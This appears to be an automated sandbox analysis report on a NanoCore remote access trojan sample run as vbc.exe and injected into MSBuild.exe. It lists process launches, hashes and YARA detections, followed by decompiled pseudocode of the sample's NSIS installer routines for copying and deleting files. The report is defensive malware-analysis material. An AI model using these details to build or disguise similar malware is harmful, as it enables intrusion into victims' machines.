                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:22
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x13c0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:26
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:28
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x13c0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:33
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:35
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x13c0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:41
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:43
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0xd0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Start time:14:56:47
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            Disassembly

                            Code Analysis

                              Executed Functions

                              C-Code - Quality: 86%
                              			_entry_() {
                              				signed int _t42;
                              				intOrPtr* _t47;
                              				CHAR* _t51;
                              				char* _t53;
                              				CHAR* _t55;
                              				void* _t59;
                              				intOrPtr _t61;
                              				int _t63;
                              				int _t66;
                              				signed int _t67;
                              				int _t68;
                              				signed int _t70;
                              				void* _t94;
                              				signed int _t110;
                              				void* _t113;
                              				void* _t118;
                              				intOrPtr* _t119;
                              				char _t122;
                              				signed int _t141;
                              				signed int _t142;
                              				int _t150;
                              				void* _t151;
                              				intOrPtr* _t153;
                              				CHAR* _t156;
                              				CHAR* _t157;
                              				void* _t159;
                              				char* _t160;
                              				void* _t163;
                              				void* _t164;
                              				char _t189;
                              
                              				 *(_t164 + 0x18) = 0;
                              				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                              				 *(_t164 + 0x20) = 0;
                              				 *(_t164 + 0x14) = 0x20;
                              				SetErrorMode(0x8001); // executed
                              				_t42 = GetVersion() & 0xbfffffff;
                              				 *0x42474c = _t42;
                              				if(_t42 != 6) {
                              					_t119 = E00406631(0);
                              					if(_t119 != 0) {
                              						 *_t119(0xc00);
                              					}
                              				}
                              				_t156 = "UXTHEME";
                              				do {
                              					E004065C3(_t156); // executed
                              					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                              				} while ( *_t156 != 0);
                              				E00406631(0xb);
                              				 *0x424744 = E00406631(9);
                              				_t47 = E00406631(7);
                              				if(_t47 != 0) {
                              					_t47 =  *_t47(0x1e);
                              					if(_t47 != 0) {
                              						 *0x42474f =  *0x42474f | 0x00000040;
                              					}
                              				}
                              				__imp__#17(_t159);
                              				__imp__OleInitialize(0); // executed
                              				 *0x424818 = _t47;
                              				SHGetFileInfoA(0x41fd10, 0, _t164 + 0x38, 0x160, 0); // executed
                              				E00406228(0x423f40, "NSIS Error");
                              				_t51 = GetCommandLineA();
                              				_t160 = "\"C:\\Users\\Public\\vbc.exe\" ";
                              				E00406228(_t160, _t51);
                              				 *0x424740 = 0x400000;
                              				_t53 = _t160;
                              				if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
                              					 *(_t164 + 0x14) = 0x22;
                              					_t53 =  &M0042A001;
                              				}
                              				_t55 = CharNextA(E00405BEB(_t53,  *(_t164 + 0x14)));
                              				 *(_t164 + 0x1c) = _t55;
                              				while(1) {
                              					_t122 =  *_t55;
                              					_t172 = _t122;
                              					if(_t122 == 0) {
                              						break;
                              					}
                              					__eflags = _t122 - 0x20;
                              					if(_t122 != 0x20) {
                              						L13:
                              						__eflags =  *_t55 - 0x22;
                              						 *(_t164 + 0x14) = 0x20;
                              						if( *_t55 == 0x22) {
                              							_t55 =  &(_t55[1]);
                              							__eflags = _t55;
                              							 *(_t164 + 0x14) = 0x22;
                              						}
                              						__eflags =  *_t55 - 0x2f;
                              						if( *_t55 != 0x2f) {
                              							L25:
                              							_t55 = E00405BEB(_t55,  *(_t164 + 0x14));
                              							__eflags =  *_t55 - 0x22;
                              							if(__eflags == 0) {
                              								_t55 =  &(_t55[1]);
                              								__eflags = _t55;
                              							}
                              							continue;
                              						} else {
                              							_t55 =  &(_t55[1]);
                              							__eflags =  *_t55 - 0x53;
                              							if( *_t55 != 0x53) {
                              								L20:
                              								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
                              								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
                              									L24:
                              									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
                              									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
                              										 *((char*)(_t55 - 2)) = 0;
                              										__eflags =  &(_t55[2]);
                              										E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp",  &(_t55[2]));
                              										L30:
                              										_t157 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                              										GetTempPathA(0x400, _t157);
                              										_t59 = E00403430(_t172);
                              										_t173 = _t59;
                              										if(_t59 != 0) {
                              											L33:
                              											DeleteFileA("1033"); // executed
                              											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
                              											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                              											if(_t61 != 0) {
                              												L43:
                              												E00403949();
                              												__imp__OleUninitialize();
                              												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                              												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                              													__eflags =  *0x4247f4;
                              													if( *0x4247f4 == 0) {
                              														L67:
                              														_t63 =  *0x42480c;
                              														__eflags = _t63 - 0xffffffff;
                              														if(_t63 != 0xffffffff) {
                              															 *(_t164 + 0x14) = _t63;
                              														}
                              														ExitProcess( *(_t164 + 0x14));
                              													}
                              													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                              													__eflags = _t66;
                              													_t150 = 2;
                              													if(_t66 != 0) {
                              														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                              														 *(_t164 + 0x38) = 1;
                              														 *(_t164 + 0x44) = _t150;
                              														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                              													}
                              													_t67 = E00406631(4);
                              													__eflags = _t67;
                              													if(_t67 == 0) {
                              														L65:
                              														_t68 = ExitWindowsEx(_t150, 0x80040002);
                              														__eflags = _t68;
                              														if(_t68 != 0) {
                              															goto L67;
                              														}
                              														goto L66;
                              													} else {
                              														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                              														__eflags = _t70;
                              														if(_t70 == 0) {
                              															L66:
                              															E0040140B(9);
                              															goto L67;
                              														}
                              														goto L65;
                              													}
                              												}
                              												E00405944( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                              												ExitProcess(2);
                              											}
                              											if( *0x424760 == 0) {
                              												L42:
                              												 *0x42480c =  *0x42480c | 0xffffffff;
                              												 *(_t164 + 0x18) = E00403A3B( *0x42480c);
                              												goto L43;
                              											}
                              											_t153 = E00405BEB(_t160, 0);
                              											if(_t153 < _t160) {
                              												L39:
                              												_t182 = _t153 - _t160;
                              												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                              												if(_t153 < _t160) {
                              													_t151 = E004058AF(_t185);
                              													lstrcatA(_t157, "~nsu");
                              													if(_t151 != 0) {
                              														lstrcatA(_t157, "A");
                              													}
                              													lstrcatA(_t157, ".tmp");
                              													_t162 = "C:\\Users\\Public";
                              													if(lstrcmpiA(_t157, "C:\\Users\\Public") != 0) {
                              														_push(_t157);
                              														if(_t151 == 0) {
                              															E00405892();
                              														} else {
                              															E00405815();
                              														}
                              														SetCurrentDirectoryA(_t157);
                              														_t189 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
                              														if(_t189 == 0) {
                              															E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t162);
                              														}
                              														E00406228(0x425000,  *(_t164 + 0x1c));
                              														_t137 = "A";
                              														_t163 = 0x1a;
                              														 *0x425400 = "A";
                              														do {
                              															E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x120)));
                              															DeleteFileA(0x41f910);
                              															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\Public\\vbc.exe", 0x41f910, 1) != 0) {
                              																E00406007(_t137, 0x41f910, 0);
                              																E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x124)));
                              																_t94 = E004058C7(0x41f910);
                              																if(_t94 != 0) {
                              																	CloseHandle(_t94);
                              																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                              																}
                              															}
                              															 *0x425400 =  *0x425400 + 1;
                              															_t163 = _t163 - 1;
                              														} while (_t163 != 0);
                              														E00406007(_t137, _t157, 0);
                              													}
                              													goto L43;
                              												}
                              												 *_t153 = 0;
                              												_t154 = _t153 + 4;
                              												if(E00405CAE(_t182, _t153 + 4) == 0) {
                              													goto L43;
                              												}
                              												E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t154);
                              												E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t154);
                              												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                              												goto L42;
                              											}
                              											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
                              											while( *_t153 != _t110) {
                              												_t153 = _t153 - 1;
                              												if(_t153 >= _t160) {
                              													continue;
                              												}
                              												goto L39;
                              											}
                              											goto L39;
                              										}
                              										GetWindowsDirectoryA(_t157, 0x3fb);
                              										lstrcatA(_t157, "\\Temp");
                              										_t113 = E00403430(_t173);
                              										_t174 = _t113;
                              										if(_t113 != 0) {
                              											goto L33;
                              										}
                              										GetTempPathA(0x3fc, _t157);
                              										lstrcatA(_t157, "Low");
                              										SetEnvironmentVariableA("TEMP", _t157);
                              										SetEnvironmentVariableA("TMP", _t157);
                              										_t118 = E00403430(_t174);
                              										_t175 = _t118;
                              										if(_t118 == 0) {
                              											goto L43;
                              										}
                              										goto L33;
                              									}
                              									goto L25;
                              								}
                              								_t141 = _t55[4];
                              								__eflags = _t141 - 0x20;
                              								if(_t141 == 0x20) {
                              									L23:
                              									_t15 = _t164 + 0x20;
                              									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                              									__eflags =  *_t15;
                              									goto L24;
                              								}
                              								__eflags = _t141;
                              								if(_t141 != 0) {
                              									goto L24;
                              								}
                              								goto L23;
                              							}
                              							_t142 = _t55[1];
                              							__eflags = _t142 - 0x20;
                              							if(_t142 == 0x20) {
                              								L19:
                              								 *0x424800 = 1;
                              								goto L20;
                              							}
                              							__eflags = _t142;
                              							if(_t142 != 0) {
                              								goto L20;
                              							}
                              							goto L19;
                              						}
                              					} else {
                              						goto L12;
                              					}
                              					do {
                              						L12:
                              						_t55 =  &(_t55[1]);
                              						__eflags =  *_t55 - 0x20;
                              					} while ( *_t55 == 0x20);
                              					goto L13;
                              				}
                              				goto L30;
                              			}


































                              APIs
                              • SetErrorMode.KERNELBASE ref: 00403486
                              • GetVersion.KERNEL32 ref: 0040348C
                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BF
                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004034FB
                              • OleInitialize.OLE32(00000000), ref: 00403502
                              • SHGetFileInfoA.SHELL32(0041FD10,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 0040351E
                              • GetCommandLineA.KERNEL32(00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00403533
                              • CharNextA.USER32(00000000), ref: 0040356F
                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366C
                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040367D
                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403689
                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040369D
                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036A5
                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036B6
                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036BE
                              • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036D2
                                • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?,?,?,004034D4,0000000B), ref: 0040665E
                                • Part of subcall function 00403A3B: lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,76712754), ref: 00403B2B
                                • Part of subcall function 00403A3B: lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                • Part of subcall function 00403A3B: GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
                                • Part of subcall function 00403A3B: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403B92
                                • Part of subcall function 00403A3B: RegisterClassA.USER32(00423EE0), ref: 00403BCF
                                • Part of subcall function 00403949: CloseHandle.KERNEL32(00000184), ref: 0040395B
                                • Part of subcall function 00403949: CloseHandle.KERNEL32(00000188), ref: 0040396F
                              • OleUninitialize.OLE32 ref: 00403780
                              • ExitProcess.KERNEL32 ref: 004037A1
                              • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038BE
                              • OpenProcessToken.ADVAPI32(00000000), ref: 004038C5
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038DD
                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004038FC
                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403920
                              • ExitProcess.KERNEL32 ref: 00403943
                                • Part of subcall function 00405944: MessageBoxIndirectA.USER32 ref: 0040599F
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                              • String ID: "$"C:\Users\Public\vbc.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                              • API String ID: 538718688-1344886843
                              • Opcode ID: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
                              • Instruction ID: 58fd70292e904df403817bc88459b0d0072f96867834376c9e66c0a03af616e1
                              • Opcode Fuzzy Hash: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
                              • Instruction Fuzzy Hash: 2EC1D7701047806ED7217F659D49B2B3EACEB81706F05447FF582B61E2CB7C8A198B6E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E004059F0(void* __eflags, signed int _a4, signed int _a8) {
                              				signed int _v8;
                              				void* _v12;
                              				signed int _v16;
                              				struct _WIN32_FIND_DATAA _v336;
                              				signed int _t40;
                              				char* _t53;
                              				signed int _t55;
                              				signed int _t58;
                              				signed int _t64;
                              				signed int _t66;
                              				void* _t68;
                              				signed char _t69;
                              				CHAR* _t71;
                              				void* _t72;
                              				CHAR* _t73;
                              				char* _t76;
                              
                              				_t69 = _a8;
                              				_t73 = _a4;
                              				_v8 = _t69 & 0x00000004;
                              				_t40 = E00405CAE(__eflags, _t73);
                              				_v16 = _t40;
                              				if((_t69 & 0x00000008) != 0) {
                              					_t66 = DeleteFileA(_t73); // executed
                              					asm("sbb eax, eax");
                              					_t68 =  ~_t66 + 1;
                              					 *0x4247e8 =  *0x4247e8 + _t68;
                              					return _t68;
                              				}
                              				_a4 = _t69;
                              				_t8 =  &_a4;
                              				 *_t8 = _a4 & 0x00000001;
                              				__eflags =  *_t8;
                              				if( *_t8 == 0) {
                              					L5:
                              					E00406228(0x421d58, _t73);
                              					__eflags = _a4;
                              					if(_a4 == 0) {
                              						E00405C07(_t73);
                              					} else {
                              						lstrcatA(0x421d58, "\*.*");
                              					}
                              					__eflags =  *_t73;
                              					if( *_t73 != 0) {
                              						L10:
                              						lstrcatA(_t73, 0x40a014);
                              						L11:
                              						_t71 =  &(_t73[lstrlenA(_t73)]);
                              						_t40 = FindFirstFileA(0x421d58,  &_v336);
                              						__eflags = _t40 - 0xffffffff;
                              						_v12 = _t40;
                              						if(_t40 == 0xffffffff) {
                              							L29:
                              							__eflags = _a4;
                              							if(_a4 != 0) {
                              								_t32 = _t71 - 1;
                              								 *_t32 =  *(_t71 - 1) & 0x00000000;
                              								__eflags =  *_t32;
                              							}
                              							goto L31;
                              						} else {
                              							goto L12;
                              						}
                              						do {
                              							L12:
                              							_t76 =  &(_v336.cFileName);
                              							_t53 = E00405BEB( &(_v336.cFileName), 0x3f);
                              							__eflags =  *_t53;
                              							if( *_t53 != 0) {
                              								__eflags = _v336.cAlternateFileName;
                              								if(_v336.cAlternateFileName != 0) {
                              									_t76 =  &(_v336.cAlternateFileName);
                              								}
                              							}
                              							__eflags =  *_t76 - 0x2e;
                              							if( *_t76 != 0x2e) {
                              								L19:
                              								E00406228(_t71, _t76);
                              								__eflags = _v336.dwFileAttributes & 0x00000010;
                              								if(__eflags == 0) {
                              									_t55 = E004059A8(__eflags, _t73, _v8);
                              									__eflags = _t55;
                              									if(_t55 != 0) {
                              										E0040534F(0xfffffff2, _t73);
                              									} else {
                              										__eflags = _v8 - _t55;
                              										if(_v8 == _t55) {
                              											 *0x4247e8 =  *0x4247e8 + 1;
                              										} else {
                              											E0040534F(0xfffffff1, _t73);
                              											E00406007(_t72, _t73, 0);
                              										}
                              									}
                              								} else {
                              									__eflags = (_a8 & 0x00000003) - 3;
                              									if(__eflags == 0) {
                              										E004059F0(__eflags, _t73, _a8);
                              									}
                              								}
                              								goto L27;
                              							}
                              							_t64 =  *((intOrPtr*)(_t76 + 1));
                              							__eflags = _t64;
                              							if(_t64 == 0) {
                              								goto L27;
                              							}
                              							__eflags = _t64 - 0x2e;
                              							if(_t64 != 0x2e) {
                              								goto L19;
                              							}
                              							__eflags =  *((char*)(_t76 + 2));
                              							if( *((char*)(_t76 + 2)) == 0) {
                              								goto L27;
                              							}
                              							goto L19;
                              							L27:
                              							_t58 = FindNextFileA(_v12,  &_v336);
                              							__eflags = _t58;
                              						} while (_t58 != 0);
                              						_t40 = FindClose(_v12);
                              						goto L29;
                              					}
                              					__eflags =  *0x421d58 - 0x5c;
